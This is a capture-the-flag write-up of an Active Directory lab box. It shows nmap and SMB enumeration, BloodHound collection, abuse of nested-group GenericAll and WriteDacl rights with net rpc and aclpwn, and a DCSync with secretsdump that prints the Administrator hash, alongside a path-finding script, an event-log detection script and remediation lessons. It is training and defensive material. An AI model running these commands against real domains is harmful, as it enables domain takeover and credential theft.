Active Directory Exploitation: Forest to Domain Admin

● HARD 📅 January 15, 2024 ⏱️ 45 min read 🏆 40 points 🏷️ AD, BloodHound, Kerberoasting

Reconnaissance

Started with a full-port nmap scan (-p-) with default scripts and version detection. The combination of DNS, Kerberos, LDAP, SMB and WinRM shows the target is a Windows Server 2016 Domain Controller.

nmap scan
$ nmap -sC -sV -p- 10.10.10.161

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0
💡 Key Finding: Port 88 (Kerberos) and 389/3268 (LDAP and Global Catalog) confirm this is a Domain Controller. SMB (445) is open for share and user enumeration, and 5985 (WinRM) gives a remote shell once valid credentials are in hand.

Initial Access

Enumerated SMB shares with a null session via crackmapexec. Only the default NETLOGON and SYSVOL shares were readable anonymously, and they contained no credentials. The svc-alfresco credentials (password s3rvice) used in the next section were obtained in a separate step that is not shown on this page.

smb enumeration
$ crackmapexec smb 10.10.10.161 -u '' -p '' --shares

SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 (name:FOREST) (domain:htb.local)
SMB         10.10.10.161    445    FOREST           [+] Enumerated shares
SMB         10.10.10.161    445    FOREST           Share           Permissions     Remark
SMB         10.10.10.161    445    FOREST           -----           -----------     ------
SMB         10.10.10.161    445    FOREST           ADMIN$                          Remote Admin
SMB         10.10.10.161    445    FOREST           C$                              Default share
SMB         10.10.10.161    445    FOREST           IPC$            READ            Remote IPC
SMB         10.10.10.161    445    FOREST           NETLOGON        READ            Logon server share 
SMB         10.10.10.161    445    FOREST           SYSVOL          READ            Logon server share

Domain Enumeration

Used BloodHound to map the domain and identify attack paths. Collected the data with the bloodhound-python ingestor (the Python port of SharpHound's collection) from the attacking host, authenticating as svc-alfresco.

bloodhound collection
$ bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161

INFO: Found AD domain: htb.local
INFO: Connecting to LDAP server: forest.htb.local
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 5 computers
INFO: Found 20 users
INFO: Found 52 groups
INFO: Found 0 trusts
INFO: Done in 00:00:15
⚠️ Critical Path Identified: svc-alfresco does not hold DCSync rights itself. BloodHound showed a short path from the account to the domain object: nested group membership ending in a group with WriteDacl on htb.local, which lets the attacker grant themselves the replication rights needed for DCSync and so reach Domain Admin-equivalent access.

Privilege Escalation

From the BloodHound data: svc-alfresco is a member of "Service Accounts", which is nested in "Privileged IT Accounts", which is in turn a member of the built-in "Account Operators" group. Account Operators has GenericAll over the "Exchange Windows Permissions" group, and that group holds WriteDacl on the domain object. So the chain is: add svc-alfresco to Exchange Windows Permissions, then use the group's WriteDacl to write a DACL entry granting svc-alfresco DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on htb.local.

privilege escalation chain
# Step 1: abuse GenericAll (inherited via Account Operators) to add svc-alfresco to
# Exchange Windows Permissions. Samba's net rpc form runs from the attacking Linux host;
# the equivalent from a Windows session is: net group "Exchange Windows Permissions" svc-alfresco /add /domain
$ net rpc group addmem "Exchange Windows Permissions" svc-alfresco -U htb.local/svc-alfresco%s3rvice -S 10.10.10.161

# Step 2: abuse the group's WriteDacl on the domain object to grant svc-alfresco the
# DS-Replication-Get-Changes(-All) rights (DCSync). aclpwn resolves the path from BloodHound's
# neo4j database: -u/-p are the domain credentials, -du/-dp are the neo4j database
# credentials (the neo4j password below is a placeholder).
$ python3 /opt/aclpwn.py -f svc-alfresco -ft user -t htb.local -tt domain -d htb.local -s 10.10.10.161 -u svc-alfresco -p s3rvice -du neo4j -dp <neo4j-password>
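The path BloodHound surfaced in the Domain Enumeration section and the chain abused above are the same graph problem: find the shortest sequence of abusable edges from a principal to a dangerous right on the domain object. The following is an added example, not code from this writeup or from BloodHound/aclpwn. It builds a hand-constructed edge list mirroring the relationships described for this box (the group names are the page's; the distractor edges are made up to show dead ends) and runs a breadth-first search that returns the ordered hops and the abuse each hop implies.

```python
"""Attack-path search over BloodHound-style edges (added example; constructed graph)."""
from collections import deque

# Constructed edge list: (source, relationship, target). Mirrors the Forest path
# described in the writeup; the DOMAIN ADMINS and CanPSRemote edges are distractors.
EDGES = [
    ("SVC-ALFRESCO", "MemberOf", "SERVICE ACCOUNTS"),
    ("SERVICE ACCOUNTS", "MemberOf", "PRIVILEGED IT ACCOUNTS"),
    ("PRIVILEGED IT ACCOUNTS", "MemberOf", "ACCOUNT OPERATORS"),
    ("ACCOUNT OPERATORS", "GenericAll", "EXCHANGE WINDOWS PERMISSIONS"),
    ("EXCHANGE WINDOWS PERMISSIONS", "WriteDacl", "HTB.LOCAL"),
    ("DOMAIN ADMINS", "DCSync", "HTB.LOCAL"),          # not reachable from svc-alfresco
    ("SVC-ALFRESCO", "CanPSRemote", "FOREST.HTB.LOCAL"),  # WinRM shell, dead end for DCSync
]

# What an attacker controlling the source does with each edge type.
ABUSE = {
    "MemberOf": "already a member: inherit the group's rights",
    "GenericAll": "add yourself to the group (full control over it)",
    "WriteDacl": "grant yourself DS-Replication-Get-Changes(-All), i.e. DCSync",
    "DCSync": "replicate secrets with secretsdump.py",
    "CanPSRemote": "open a WinRM shell",
}


def build_graph(edges):
    """Adjacency list: node -> [(relationship, neighbour), ...]."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
    return graph


def find_path(edges, start, target, goal_rights=("WriteDacl", "DCSync", "GenericAll")):
    """BFS for the shortest chain from start to a goal right on target.

    Every traversed edge is treated as transferring control (membership, GenericAll
    over a group); the search stops at the first edge into target whose
    relationship is one of goal_rights. Returns [(src, rel, dst), ...] or None.
    """
    graph = build_graph(edges)
    parent = {start: None}          # node -> hop that first reached it
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for rel, nxt in graph.get(node, []):
            hop = (node, rel, nxt)
            if nxt == target and rel in goal_rights:
                path = [hop]
                cur = node
                while parent[cur] is not None:
                    path.append(parent[cur])
                    cur = parent[cur][0]
                return path[::-1]
            if nxt not in parent:
                parent[nxt] = hop
                queue.append(nxt)
    return None


def describe(path):
    """Render each hop with the abuse it implies."""
    return [f"{src} -[{rel}]-> {dst}: {ABUSE.get(rel, 'unknown edge')}"
            for src, rel, dst in path]


if __name__ == "__main__":
    route = find_path(EDGES, "SVC-ALFRESCO", "HTB.LOCAL")
    for line in describe(route) if route else ["no path"]:
        print(line)
```

The search deliberately counts MemberOf and GenericAll as free control transfers, which is how nested membership lets a right granted to Account Operators surface on a service account several groups away. Restricting goal_rights to ("DCSync",) returns None for svc-alfresco, which is the point of the page: the account never holds DCSync directly, it writes its way to it.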

Domain Admin Compromise

Performed a DCSync attack with impacket's secretsdump.py, which uses the DRSUAPI replication interface that the newly written ACEs permit. The command below pulls only the Administrator account; dropping -just-dc-user (or pointing it at krbtgt) dumps the krbtgt secret needed to forge a Golden Ticket for persistence.

dcsync attack
$ secretsdump.py htb.local/svc-alfresco:s3rvice@10.10.10.161 -just-dc-user Administrator

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:154cb566bedd0220d0...
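Each step of the chain above leaves a distinct trace in the Domain Controller's Security log: the group addition (4728/4732/4756 depending on group scope), the DACL write on the domain object (5136 on nTSecurityDescriptor) and the replication itself (4662 carrying the DS-Replication-Get-Changes control-access GUIDs). The following is an added detection example, not part of the original writeup or any vendor product; the sample events are constructed to model the real event fields rather than captured from the box, and the "machine accounts end in $" filter is a simplification of a proper DC allow-list.

```python
"""Detect the Forest-style chain from constructed Security-log events (added example)."""
import json
import re

# Control-access right GUIDs that appear in the Properties of a 4662 event when a
# principal replicates directory secrets. These values are fixed by the AD schema.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GROUP_ADD_EVENTS = {4728: "global", 4732: "domain local", 4756: "universal"}
SENSITIVE_GROUPS = {"exchange windows permissions", "account operators", "domain admins"}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Constructed sample events, one flattened JSON object per line (not real captures).
SAMPLE_LOG = """
{"EventID": 4756, "SubjectUserName": "svc-alfresco", "TargetUserName": "Exchange Windows Permissions", "MemberName": "CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local"}
{"EventID": 5136, "SubjectUserName": "svc-alfresco", "ObjectDN": "DC=htb,DC=local", "AttributeLDAPDisplayName": "nTSecurityDescriptor"}
{"EventID": 4662, "SubjectUserName": "svc-alfresco", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "FOREST$", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4624, "SubjectUserName": "jsmith", "LogonType": 3}
"""


def parse_events(text):
    """One JSON object per non-empty line; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def replication_rights(event):
    """Names of the replication rights referenced in a 4662 event's Properties."""
    found = GUID_RE.findall(event.get("Properties", ""))
    return [REPLICATION_GUIDS[g.lower()] for g in found if g.lower() in REPLICATION_GUIDS]


def detect(text):
    """Return (rule, subject, detail) tuples for the three stages of the chain."""
    alerts = []
    for ev in parse_events(text):
        eid = ev.get("EventID")
        who = ev.get("SubjectUserName", "")
        if eid == 4662:
            rights = replication_rights(ev)
            # DCs replicate legitimately under their machine accounts (trailing '$').
            # Simplification: production rules should allow-list DC accounts explicitly.
            if rights and not who.endswith("$"):
                alerts.append(("dcsync", who, ", ".join(rights)))
        elif eid in GROUP_ADD_EVENTS:
            group = ev.get("TargetUserName", "")
            if group.lower() in SENSITIVE_GROUPS:
                alerts.append(("sensitive-group-add", who,
                               f"{ev.get('MemberName', '?')} -> {group} ({GROUP_ADD_EVENTS[eid]})"))
        elif eid == 5136:
            # A DACL write on the domain head (DN starts with DC=) is the WriteDacl abuse.
            if (ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"
                    and ev.get("ObjectDN", "").upper().startswith("DC=")):
                alerts.append(("domain-dacl-write", who, ev["ObjectDN"]))
    return alerts


if __name__ == "__main__":
    for rule, who, detail in detect(SAMPLE_LOG):
        print(f"[{rule}] {who}: {detail}")
```

5136 only fires when the DS Access / Directory Service Changes audit subcategory is enabled and a SACL exists on the domain object, and 4662 likewise needs Directory Service Access auditing, so these rules are only as good as the audit policy behind them. The FOREST$ line in the sample is the DC's own replication and is correctly ignored.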

Root Flag Captured

HTB{4ct1v3_d1r3ct0ry_0wn3d}

Lessons Learned

This box demonstrated the importance of auditing nested group membership and ACLs in Active Directory. No single assignment looked dangerous on its own: a service account in a custom group, that group nested under Account Operators, Account Operators holding GenericAll over an Exchange group, and the Exchange Windows Permissions group's WriteDacl on the domain object. Together they form a path from a low-privileged service account to DCSync. BloodHound-style graph analysis finds such paths; fixing them means flattening unnecessary nesting, keeping service accounts out of Account Operators, and removing or constraining the Exchange group's rights on the domain object.